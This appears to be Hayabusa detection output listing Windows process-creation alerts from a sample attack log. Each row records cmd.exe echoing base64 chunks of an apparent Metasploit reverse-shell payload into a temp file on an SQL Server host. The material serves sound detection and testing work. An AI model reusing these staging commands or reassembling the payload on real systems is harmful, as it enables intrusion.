+2020-08-02 07:58:14.106 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QQDWYwVVAHXwhcotI6HgAkEAUOgVnP//i8bHBeACQQAAAEOyxgXYApgAAHCL5V3Diw3cAkEABYzzQABRJiwMAACCFdwCcQBS6I9ZLACFwHU5odwCQQCNTfxXaotR6NxXYACFWXW2iyH8oeCLQQD3UI8Ifv//iw3cAtMA2RU1AkELUVLoFf//hTPAXr7lXaWQkNaQMvhnzJC6kIpkkKDYAooAhIl0KP7IotgCQQB1H6HcAkEAUOjDAwAAxwWvAkEAAAAAAMcF4AKlAAAAAADDkGyQkJCQzJANUvuQkPFVi7OD7AyLRQxTjVeNUKeD4i470ItFCIlV+HMdnEAghcCRhEYCIQBqDP/qg8QEM8BfvFuL5V3eCACLuiyLThCL0RQr5b9PAhAD0V+JVhBei5Fbi3NdeQgAiwCLERSLWRAr+zvXdxmLQT6LOYk4iwH3eQSJeJXpcAbyAIt4GI2aFxAAAIHjAPD/EzvaiV0MD4LLAQAAovsAYQAAc87HkAwAIAAAIF0Mi9PB6gxNg/r/iVX8D4cdAQAAOzp7h4VJyACLRwyFwCnJs+hyVwAAi+X8i1yXFIsPjUQlFIWZ+A870bYLi1gEg8AEQoXbdDmLp4XbiV30dH9PG4Xb7AF1FTvRchGL0/yDeQRJzNJ1BNDJ2vGJD4td9ItHCFVLaQMViUcIi8iLR9I7yHYDiUf8i+wMd/90BlfopqH1rI1TGIlTEOmaogA6i0cUhUN0OYtHDBDAdAZQOhdXAACLXxQ6RxSF2zoSi038i1MIO0d2SIvDixuF23Xui38MutJ0BlfodFcYtYtzDFP/eFzBQCmDxASFNg+ExQAAPItV/I09GIlQCI0UGInhEFMAANIAAIlQFIvI6zSLE4kQi0Mri38IA8jtRwQ7yIlPinZciUcIi38Mhf90BlejB1cAII1LGIlLEMcDAEAAAIvLi1X4/0Ezx0EMub8AADHQifBPaFYEiVFYiQo9VQiJOolOBIlKLItOFIt+ayvPiz6BwQAQAACL14HhR/D//0nB+QyJTgyLWgw7y3P/ixI7Sihy+YvABIk5iw6LfgSJeQRySgSJTgRrMYmg+XJ7ll6W/OU6wj6ji+MI62oghQ7gB2oM/+6DxARfXjPAW4vlFsIIAHiQipCQkKyQVWzsuWoMU1ZXi30IeXc4M+j7XwAAi0cEM4GDxAQ7w4mJiQI8dA1Q6PQAAACkRwQ7w3XzjXdvVujUCQAAkt8cKh5QmF8U6Aa0AADvRzCLWjSJXxyJySSJRyyJSBCLeFzECDvIiUX084SpAACei1AE/BqLf5iL5otHDIXAdAZQhW10AACLB4tPBItXCInDCFDG/LITi038iUX4i0YIhcl0msvsdgaJHove6y+D+BRUGItMwxuF8okOdQg7RQh2A7ZFCIl06xTr/Is4J4kOiXcUO9ByBCt26wIz0ot1+IX2dbGLnwh0IAiJB1p/6oX/UwZX6GtVAACF>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x46c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:14.380 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 23QUizUwwUAAi8OLG1B8SYPERIXbdYqLRfSJABmTBF9eW4vlXSgEAJCQVYvsgxYMU4vkA1ZXVHM4q+jbCPtdEUMEg8QEhdPHBgAAAPbHqecArwAAdA1Q6M7///9xQw2qwHXzjUNZUOgZFIUAi1bjUehRCAAAi1SDNQiFwHSXi1AYpuh8+v8ni/CF9nQGVupnVAAAi0MMi0sIiQiLQww8TQB0gotTCIlCDIWudAZWsIdUAACLczCLezlXi0YQxxYAAAAA6JL6//87x+0IagBx6Of6Yf+LRwwz24XAdH4l6BdUSwAOVwSLbIlV+ItXCA07/IkGi+H4iUWti0YIhcl0CjvC3w2JHove6wWD+BRzGItMFxSFyYlSdQg7RRd2A4lF/Il0hxTrCItPFIm4iTgUO9ByBA7QcAIz0ot19Jn2HzCLU/yJpkSJB4tHDIXAdDJQ6BVU9wCF23QUizXMVEAA8cOLG1D/1oPEBIXbdfJX6Of5//87RYt1Fq3ou/lbbV9e+w7lXcIEhJCQbPSLEItFCMf7AAAAgYsHDIXAdQuLDaECQQCJTdSLwYtNEIXJdQqFwEsGi1AgiVUQU/9dFDxXhdt1A4tYGIsDvwEAxgA7x3JXi0MMhcB0BlDoHFMAALDFGIsLjUMYi9eF9nXmO9FzCxtwBINVBEKF9lDxizBtMXRTiz6F/4k4D4WKAAAxO9EPpoIAAAAMUPwa+QRJhYl1BIXVd/GJC+sTi0MUgnMUhcB0L4pDDIXegAZQFrtSAGGLxosRhfZ0DTl+CHMDNMaLNoX2dfOLOeiUwHQGUAgJUwAAaAAgmQD/FcvBQAC38IPEBIX2D4TZAAAAjUYYZoYAIAA+yAZeAFAAMn4IiVYQ70YU6zSLFokQizLki5zGA/iLQxyLz4kpt8LI/AOJQ1REQwyFwHQGUOivQAAAjU4YxwYAAABHiU4Qi34QixEAiTaJzgSNR0CJRzSJRgqJXxiLXQy6d7fdOywz9rVPIDveiQQEiXcQ7HcUifmZiXc8iXcciXckiXcoiR90YotTGFJOJ/jujjvGiUUQdAmxztotAACLdRBJSwSDwwRYVwg7zokKEAOJUQw1O47Gia4wdDRQ6CZSAOhNRQiJVV9eMwb5XcIQAItFEIXAdAdqDP/Qg8QEX164DJ4AAFtdwhAAf3cIiXe9+h8IJjhfXjPAW3LCEACQkJCQkJCQkJBoVYvsRuwgX1ZXi2QIjn3sM9uLRyxYRSKLIxCJTeCLUItKxkXwAJlVsIld9ItGEPdQGTvKdSqNVeCR6G4BAACDQQR1+P91GYtHIDvD6ztqhP/Qg8TJM8BfXluL5V3CDACLRRCLTQxQjTBNUVJoQFNAAOj7HgAAyvj/dRltRyA7w3SClzX/0FTEBF9eM8Bbi+VdwgwtAEUE2QAAi01Di1EQK8KJVdGDwAgk8QM8iUFDi0v0O2Ry0aAA8vFJfxiLRwyFcXQGUOinUAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:14.653 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 0FcEEg+JVWOLVwiJTQyLBotN/IniYotGCIXJdAo7wlQGiR6L3usvg/gUcwWL5JgUn8mJQYkIO0UMdkyJRaGJdIcU6wiLTxTIDol3FDvQcgQr0DZ3UNKL1viFBXWxi0UMnVcIiQeLfwyF/3QGV+iJUAAAhb50FIs1MNbYh90+ixt2/9b7xASF9jjyizQQi30IikXwhMB1C19ei8KOi+VdwgwAoU3oi0csxzUMAFoAFYtQXYlRBIkKiQGJSATvTyyLSBTwihCLMNoZ+sEAgQEAi9aB4fPw//9JwcYMiUgMi8kwO89zsYsdOxUMcl6LSASJMYsI4XAEiXEEi0oEifYEiQGJENRCBItFEI5eWz9VXcLuAJCQkJCQVULsg+yri1UTU1ZXi1oIoAL3egwrQzaJRfSNDFCD6yBzBbkgAAAAgHoQAIvBdfWLiRQrcBA7SXdxi0IEUDCJMXsIi3CoiXEEi0tYiUgEiQGJGIlDBMe4DE4AAMyJjCyLmOKLS5SLMyvBM84FAB0A4CUA8P//SMH4DDZDDF/VUXMhiwk7QQzk+YtDBIkwiwOLc1CJcASLQQSJQwSJ7IkTiVlti0cs6VoAAACLdxgrgRcQAAAlAPD//zvBiUX8D4K1AWAAPRcgAABzCoxF/AAgIgA3Rfzy+MHvDE+D//+JffgPh5oBFQA7OxuHK/oAAItGDIXAdAZQ6JVOAACDfBoUAIsajURgFIubTFX1OBA70XMJWsAEvoM4ZHTziVX4ixDf0olV8I6+nAAA8os6hRw5OHUWOU34chGLePyD6BtJhf91BIXJd7iJDotKCItGCAPBiUahixOLMMmnyJsDiUabi3YMhfZ0CRQulIQAwovs8I1CGMcCAAAAAIlCEIvJix4IikoQocl0CIsRFD/OFFoUxkIQAYtNgYtzENx4EIvZwekC8xexy4PhA/OkiUIIi0gwi/NfA87qiQqLQBRIW4lCBDPAi+W1w4uWDIXtdElW6FQaAAD3QYtOFIXJdD2LRvOFcHQJUOinTQAAi1UIV34UjUYUhf90EIsQ+DtPCHboi8eLP4X/dfCLdgyF9nQGVujtTUu0i31Ki0UqUDImXFtAAMPE6OHAdFmLt/y3UBiJUBDHPwAPAACNFAiJeAiJUBTpOSr//4uqKAiLRwiLTggDyEtGBDvIiU4IdgNtRgiLdgyF43QJVtP6TRkAi1UIjk8YxyB1JQAAiU8Qi8fGAP///+Beg8j/W4vlXcPBkN7lPUZV+3KLTd+LVQiNRRBQUVLofHHt/13DkJCQd5AokJCQkFWL7ItNCItFDIlBKF3CCACwi+wii3UIhSR0MH1GFIW9dAeLCIkgbusIaulW6D/0/wzsVQyLTZeJggSLVRSJSMvHUAyLThB3D8pGfWRdLhAAVYvsi1UIU1ZXhdJ0X4tCEIt1EIt9oo25EIXAdCA5eAR1BXxwCHSai8iLzYXAde7rDIsYiaOLShSJCIlR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd50 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:14.927 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo FItCOI1KOIXAdIs5eOJ1BTmiCHRPi8iLAMzAdXYrXltdWwwdixeJMYtKPIkViUI8X15bXcIMAG6QkJCQkJBGkJDbkJB5i+yLNghWi3UQ7yl9DFa0UOhZ////V//Wg8ToX15d6wwAkJCQkJCQ2pCQkJB2K5BVi+JWi2UI9waFwPAUYZaJCItQBFL/UAiLBoPE8gnAdaZeXcOQkJCQig6QapCQsZAzpcPGkJCQkE6Qz5CQhpCQVYtKg+wIU4tdiFcz/4XbhoTYAAAAVosKiwZqAchsagBQEFpNANc9dZ8BAHQHx0YEAAAAAIt2CIX2dd2L84tGBIXAdJGLDr80AAAAaglR8H4E6KBMAFaLdgiF9ojghf90yLsbtwAAVlOJdfzoGxUAAIt1CDP/MX4EaXVuxhZqAWq0agCSJPdMAAA9dhEqAHUHxwFrAADrB8dilgAAAACLDAiF9nXQhf90Kot1/IX2fyN8R4H7wMYtAAmFVlDob6oAAGoAagJWF+hEXQD+i9iJT/wfnYtdCIuag366AnUKiwZqCVCyuEsAwOZ2CIX2demLIotGBIXAdPGLDmoAagCvAFHoekwAU4t2CJr2deReX8OL5V3DkJCQWpCQkJCQyZBoVRG2vYuldjNThfZ0KzeL/oN1/9Sui0VmGdFJi7J7V1Do6/Fqv4s0V+2L0cHpAvOlf8qD4XHzpF9eXcIIAJCskJuL7INsJFNWV1p9DDPbYdKF/3QjjXVNgzj/M8DyrvePSYP7pR8FiUyd3EOLfgSDxgQD8P//deCLRQjxUnXojgH/SIvoXjPJ69yJRfRm0IlN/KxxjcMMvrL4kQOLTfxZ+QZ9CotEjcFBiU386w68/uAd/7fA8q730UlFwYuni/qLfQPQwen688KLRfiLy4PhA4PAUvOkixPqRaSF9nWOi0Vmtl/GAgBbJ+Vdw5CQDJCQVSTsg+wI6YsNyPNAkaHE80AAIxXK80AAF1aL9QxmiU0+i2oIhfZXc0X46lXpjV34f1Z8BIXJc/SLzzaLFbzzWQ6LyF9eW4nvirR/HUAAiFEEi1FdwgwAhfYLLQUIgfnNAwAAcxlhdRBRz7TzQABqBderyiwAAPI8EGnAiy8PjeWDAAB3zQAAAIvCi8GL1rkKAAAAgef/AwBZTppeAACL8ovIhTt8cH/qgfmoAwAAcgND/oF69nyJfwUk+wmcWIP5CXUMoAl1CIEEzeoAAKRHP/8ARAAAfAaDwQHWowAPvgOLdRBQUWis80AAIgVW5E4sAABgxBSFwH1tpxVI10AAm85fiXigqPNAAIhBBItLXluLY10ZCwAohL8ApQAAmYHi/wEmQwPCwb12g+uFfAiDwQGD1gAzwA++E4sUEFJQDGic80AAagUC6Jq+AACDxBiFOX0Ti8aLDaTzQACJCIoVqPNAAIhQBIvGX15bi+VdwgxhkKuQkJCQkJAEPZCQkH82VYvsU1aLsxJXajBW6I9/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xf64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:15.201 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo //+LXQiLFYAwQAAHfRBnA+wwLwPHQBQAAAAAi3yJUQShyMCOAIsLg8xAiUEIi6+NDL3mAJcAx6Eg7gIMAIsDUVaJkRjoSO//mot1FI0MvQAOagCJTaiL0Yv4wekC89yIyoPhA/Oki29fXolBHIsTi00M1KYcxxkBAAAAAIsxeQEAAADHQiQAAAAAi9mJQQwdEylCaosLW4neLDPAXcIQ/5BVi+xW4nUIV4tGFIXAtgiLRiCAOAB1TzxODItGGDv7x1YUAAAAALgki1ayiwSkiUYggDhndRaKUAFAhNJ0KInMIIoQgPotdR5BiU4Mx0Yg1PYUAJhNEIqHEF9eiAG4fhEBAF2zEACLViCLricPvgJCg/g6iZEQiVYXD3LQAAAAUN//FXzBQACDxHuFwA+EvQAAAICyATp0GotNFMcBAAAAAItWIF06AA9wkn0AAOmKAAAAi0ZygDgAdAeLsRRbARl0i5b/i04PiYvCg1YMO8h/ncdGINT1QQA8Bwk6dROLRRCK3hBfsIgQuH0RAQBdwhDYi0YEhcA2H4tWHMdOELnBAlDoCUkAAItOzVBo6PNAADb/VgSDNhCLRRCKAhBXW4gQuHwRTQBdwhAAi04cixSBA0UHiRDHRiDUAkGlhEYMi1UQik4QX8zAiApeWMLiAIN+EC0PhPrG//+LCOH1OgCJA/9GDItGBIXAs1YZPyu+H9VOHA5GEFCLEVLFkUgAcFCLRgggzPNAAKz/PQSDxNaLVRAIThCO7nyRAQCICl5dwhDlkJCQkJCQ++eQkLCQkJBVi+xRVrTo8QEAAIXAD4X9AAAAgz3cCEEAFA+MIQAAAHWExYkAZ8CNheEAACrHBYQDF2oBAILJVBVcwEAAi/Cv9nRQ8VgDQQBxwHUdDspy9EAAUQTox0sfo4PEDKNYA0EAhcAPhK8AAACNafxRVorQi/CF9nSAizH8i0UMUlZQ6IRIAACLTQiDxAxTiQu9FUTAQABT/3BawNAAi94w/1P/FSTBQABQ6IUAAACLlSeDxFuF/3R4jTSFUAAAAGqbFVzBQACDxM6JB/8VJPVAAItZ14FGMIvRwekC86WLQoPhA73OHv8VysBAAIt9KH5AAP/WiwgDhcl0Fv+6i2b//1XHwgAA7QD/FTDBQACDxKEzwF9e7+VdwgwATgEHFUyfQCLpbv//9JCQkJCQkJCQkJCQVYtxUYtFDFOLWBBWhdvTfRjSAQB5AGaDOAB1sWbUeALudAbbg8AC6+ArmgyDwALRS4lFELcEnQQAAGpQttjmwUAAi/iLRRCQdEABVol1/P8VXLxAAIPECI1NqIkHjVXRUVCLRUACMeg06AAAi/Bmiwcr8lZQaxUgwVv9uQFyAEB5xKg7MokHlSk6Wv+NRwSJTQxBi1D8ysICiaPVMAkWRoTSiQ119cJVDIPABEqJVQwakotqCMcESwAAAB2JOF+Lw15bi+Vdw5D4kJCQkJCQkFWL>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:15.474 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 7F3smDkAAKGIA0EAwchAhcmjiANBRvIGM8BA5WzDjVX4UujXGAAAg8Q5hcAPVoIAlgD/FWDAQACjVAlBAOjo6f//scB1c1ApUHhF/FDE7O//8oXgdAlMIjYAOYu2hpGLTfxoJPRYAFHoYfb//42VPf7///dqApcV0MFABoXArTlmi4Vo/v//PAJ16jPJisyEYXV+i1WHUhViswDrYEX8IVNpRPuSg8QIMz+L2V0w/xXUwUAAuBEAAACL5W/ykMqIA0EAyKOnA7kAlFboduon//8V1MFAAKFUCUHjUP+7ZOJAAMOQOJCNkJArkJCQkFWL7IpFZNqobHqXi0UImMcAALcAk7iHEQEAXcIQAIt9DOj/AAQAvDQTi00IuPgAAABfxwEAAwAAXcIQAFPKahBWaCQwBvPQcQTl//+LdQgzu4kGiUgEixaJegiL3408v4kYi0Qj57aJSgyLBoTiiTuSELA2ixaJiv8gAACLBomIGDAAAOjH6f/5iw5XU4mBHDC/AOi4zv//ixZeW1+JgiAwAAAzwDPCEACQkJCpkJCQVYSmi0UIU1ZXi0gEi1AIO8p1DF9euMsAAABbXQEIAJaQijBDAItdDI0niYtnjTyKuQUAAADzpf1TBEoBAAAAO9EPheIAOXOLUwyLMgSKUwiE0XQvi1AMM8mF0nYPjXAQOT50CBaDWwQ7ynLJO8p1E4H6ACwAAHMLiXyIEItIDEGJSBn2QwgEdD6LkBAQAAAzroXSBIGNrRQQAGE5PnQIQeZ5BDvKHPQ7ynUclfoABAAA2BSJvIgDWAAAi9UQEAAAQYmI/Y+NAPZDCHJ0PkGQFCD4ADMZT9J2SI2wGCAAAMI+dAj2g8apO8rD9DvKdRyB+gAEAABzD4m83RggAACLiBRlACRBiYgUIOEVFehfMCIAfgaJuBgwAACLSARf3m6JSAShwFtdwkopHF64CQAAACZdEggAkJBmkJBKo5CQkJBVYCCD/wiLRQxTVleDeLwBD4V3AQB5iwQ3lkUIM8mLUASLewS80ol9+HZiNrAcMAAAg8YMjx50FkGyxhTzyqL0X164fxEBAFv7Yl3CWgCL2UGNcv87yolwBHNPjRybjTyJweMCwZoCKwSJfQghVfyLiBwwAACLVQyLUr6NNLM7VuF1Bf9IWOsQRzwLuQUAAADmpQE5CINAuHoJ/DPHFEmJZgiJAfx1yIt9+ItQJjPJhdJ2Lo1wEDlbdAqtg8YEO1ty9OsQSjvKc91cVIgQi3LvQYkyi3AMg3EEsDtqcu//SP+LkBAQAAAzyYXSMzqNsBS3AACmPlwKw4PGBDvKcvQSJko7ynMbjZSI3hAAAItyBHqJMouwyRAAAIPCBE47zoTs/1QQEABti5AUIAAAM8lpmnaBjbAYIAAAOXR0CkHzxgQ7ynL06yZKO8pzG42UiL0gAAC9cgRBiWOLsFMgAK2DLgROO85yQP/NFHwAAIuIpDBkYTtB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x8e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:15.748 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dQuFyX4HSYmIYTAAAF9ezNBbi+VdwggAX7i4lQBqcVuL5V3CCIyQkJCQkFUf7P8gMADO6JNUAIZni+oIGVeLSwTHwHVafUUUX/jzxwAAAJj9M8CL5bjpFACLdRCLfQqF9n8K0ASF/3MEM8CpJWoAaI5CD9RWV+igegAAagBoQEIPAFZXZ0Xs6E9TAACJRfCNRVO5hwQAAI1zDI295JDDH1DzpbkBBAAAh7MQ/MMAjb2vV///jZXo7v//86W5y8IAAI2zYD4AAI294Bj//42F5K7//0eljY3gz///UYsfGDAAAFJBUFH/5OXBMQCLVVAz/zvHiQIuIIs12MFAAP/WhWB3hFcBAOf/yl9eBXeW2ABbJOVdwhQAqg5fXrh3ESgAW4vCXcLNfYuWBIl9EDvAiX34DzgPAQAAiboIiX3814McMAAAA8cRmoQBD4UZAQAAi0gMzJU836//UotxBFaJdfSrhVQAAIXAdSZMhejv1v8Y6ugt9gAAhQB1FVje4M///1FW6GNUAACF5g+EYQAAAIuzHLCuFotFCNn3i7sgYAAAA/i5BQAAAPOlixkgugAAyY306MdEAssAAI0ILd///9ZX6CRUAKiLdQiFwIwPi4sgUQB4gEzjCi4ARDFUjZXo7/9FUlfIAVQAAIWudA+LPCAwAACAbjAKBI1EMAqN1vLP//9Rm+iEUwAAhcB00ouTETAAAIBMMgptjYOYCotN5ot9/EGDxhQ4TRCJdQiLRfiL6mFAg8cmfYCJRfiJffwPgvkx///VOItNFCNFHYkBnUVeO8d0CJ2TmDA11FgQX14zwFsK5V2FFGWQXrgJAAAAW4vls8IUAPOQkGhVi+zyVgZm1AyF/3UFvwIAAACLRRiLdQhQVkpxAQAAwV0Ui00Qg8RbPFFXhxW8wUCPVBZBQgSLBotABIPw/3UeizW7lEAA/yyFvw/qlAAAfvfWX14FgA4KAFtdwiEAgz3cCI4AFHxyakFqIg/0FXDArwCHNv8VbMBAAIvLx0tqAI1NDGrHIYtKBOlRUMcVaMBAAArAdIeLFotCBFCfFcBYQACLDotVDInHBItFEMRqU+xXUZa3AAAAixaDyP/DxMyJQpTWIBpAAGjgZkAA50IkiwbHQCimAAAAi+RWiw5RPCzvrf9fXjPAWLHCkgDCkJDAi+xWk3UIi0Yug/j/dClQ/xXAwUAAi/j/dRaLNdh4QAD/1oWNdCkT1gWA/AqYXl3Dx0YE/////4tGTlLAdGOLQBBQV9vGwEAAx0ZAAAAAADPAXl3DLJCukJCQo5DckNlVaOyLRRCLTRRWi3UIV+jNDItWEGoAV1KJRq6cThanbQYAAF9GaGoAoVDoYQadAIPEGF9eXcM6kJC9kLGQkJCQVYvsU4sjDFZXalBT6M/i//+LdQiL+DPAi9ehjQAAACY4MKvCUIkQigaLCKnolHZi/4v4M8CL17kOAAAA86uLBmo4iVAQiw6L>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xed0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:16.021 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo URSJGosGiwhR6Iri//+L+DPAi9cTDgD5APNCJAZx3Gdqg4lQYJkOi1EUoBqLBsdANAEAAACLDoPBSFHoc/j//yRlW13DkJCQVfDsVov6CGjg21oAVosGquhm7v//Vui1/v//bMQEXqjCBACQkJCQkJCQkJCQpJCQ/YsNgewQAgAzU4tdCFZXCUP+g/j/D4SUAQAAi0IQhcnChIkBhwCLdQyLTruNVhNRUun/FaTPQACD+NIPhTd/AACLNdjBQAD/1oXAhIT5AAAA/9YFgPwKAD2zIwsAD4VRAQCshXsgi3Mki8cLxqEOX164tCMLn1ukMevCCDuLQwQPAXMAAMH2iS30/f//iY3w/f//iYX4/v//E430/v//fwp8BB//cwQzwP0lxchoQEIPAFZX6JdMAABqAGhAmZcAVrKJRe3oRk4AAIlP/FNF+I2N9BX/8lCNlfBB//9RUmoArkH/FcTBQACD+P+JRQh0TYXAdQ5fXrjMIwsAW4t6Z8IIAItL8Y2F9P7/2FDj6A1QAAA2wHRei0sEuVUMjUUIUlBoBxAAAGj/ywC9icdFCgQAAAD/CKDBQACFwDEnizXYwUBU/9aFwHXbX28z1FuL5V3CCAD/1l9eBS78CgBbdTpdwggAixQIhbVv619eW4vl6MIIAMFOAotDEIlzFGaD6ioAaBLHriyvGwAAxkgYi3AgsywEQQcz0vOmdV5fx30LAQAAAI9/wFuL5TrCCBW4wHUJAF9eW4vlXcIIdJBNkFWL7IObCEXyuVZP/xV4wEAAi1X8i0X4MywzyVLWyAvIagqhUeiNS2wALQDmhkjigdqWXikTi+Vdw5DPcpCQkJBV1YyLDQwzyU8z9maL+g4ofokcSwSNFC2LTabb4gOJETPSZotQ1KNRIDNF/4tQg4BRCDNQ14tQCCFRDDPSsYtQBolREN3SZotQe0qJURQzs2aLEM0LbAcAAIlRGDPSZotQkYm+HItHDWaLFgaLTKJAqUDdjVQy/zP2iVE2M9KJYCSJRbRmnDCLxmEDMgCAeQX2g8hmE/Uqi8aemb+QtgAA92xfhYN1GovGvsXq9ACZ9/6F0nTDi5Igg/g6fgS5PUEgXjF2kJCQkJCQkJDtkCmQ+rzsgey1AAAAU1ZkdQtXi32Hi4GLxyEABdlAhkJqCrXRlosp8lFQ6ASEAACJRbKLwsMGHx+5CEEAiVXwg/gUD4xJANwAjU38UfeyAfkAnsQEjfbc/5nsUlB7FUHAQACLRfyNTcqNVTRRUsT/FYzAQI2LXcKNhcz2U9+J/v80g8QImwCvQEIPAFZK6HBLAOCJA41V9I1FzFJQ/xWIwEAATNWSi0X0XvYzyQv4VgvIagpSUejJSQAAwABjl0hlgRiWXikAaEBCD35ShuixSQAAmvcBHgAXPUIPAFF2gvDonkkApItNi0X8EnMoi1xUiwgD+biJiIiI9++LyrjFd6KRA8/B+QUW0cHqHwPK>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:16.295 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 9+4D1tb6Cy7CldHB6B8DaxBDJF8tM8BbCuVdwsQAjU306VXsUdT/FYRKuACTRdx1TfRQEP8VfMBrDYtdV41V3FIn6N7J/9yDxAhqh2hAQg8tP1fo3XYAAInojYUg/4X/UP8VgMBAADPJK050mUh0skiDcIuNIP+o/4tVyF/HQyQBAADRjQTlXovIweF+K4/32cHhAolLmDPAW4vlXcJMAIuVdv///9eFdLVS/wNNiUski8hfweEEK8gV99nB4QKJSygzwFuLEl2oDACLhSD//7WJSyS80MHiBCvQ99rB4gKJUyhfXjPAW/rlXcIMAJCQDpCQkJBVi+yhQAVBmoXAdSp6QASaAP+AgMBAAC/sBEE/i0WoxxJABe4AAQAAAGcAQARBAKHsBMQAXXGLTTvHAX4EuACh7ARBAF3DkJCQkJCQkJCQCFWL7ItFUYtNCGqyWugDAIZQUegZQwAAUP+IkMBA113CCACQ5e6QkJCQkJCQkJCKkFWL7ItFEFYdswxXi30Ii0ggnFDlVldRUujjPwAAgwMQhcZ1Ll+4HABrAF5dwgwAxvFB/7VfM8BeXRkMAJCQkJBV91VTi10MVot1CFeLffvOz/+JXhACiV5QdA9X/3WowQcAZolGKkh7bbWD+0RquLgQAAAsx0ZiBNIAUolGCYlGtI1GSYmrIF9eW13DkJAqkFXq7I5FCMVNDGZVEFM5XS1WxwAAAAAAnscBAAAAAIv7g8n/M8DgxwIAAPKu9xlJjdGv/zvzi/5yPKGMwUCsgzhKsykLZtsEiotR/xVoAkAAg8QI6xGheNxAADPSiheLCIoEUYPgBIXADwdPO/tzyusELPtzJVMZFWxpQA0nxASD+AF8Iz3//wAAmRz6VRBf2qRmidMmT13CxgCAPzp1Njv+czI7+3UMX14qFgAAAI8ewhQIEkcBdv8VbMFAALDEBIP4AXxOPf//ZAB/pItNEI13/2aJdisNi0UYRovevlNaUrXoWdv//4u5CIt1FKzLOZCJAovBwekC86WLyIMrA2LA86SLCl9exgQLAFtdwhRDVYvnDV0Yi1UIi8FWi3UMg+ADV8cCAACTAHQrhfZ0HIt9rAj/dRWD+AOyEPbBAnQdXxyHEQEAXgXCGPhfuBYAAABvXcIYAIuqEIXAdQW4AgBbAIt9HFe8i017UVBWUujSAAAAg8QYX9ZdwhiPkJC9kFWL7IPsJFNWi/0MM9sj81dOdfR1Bb5A9EAAigY8fA+MuQAAADyCDwSXABgAaDT0QABW/xUcwcIuixyLIYPJJDN2I8QI8q730Uk70Q+F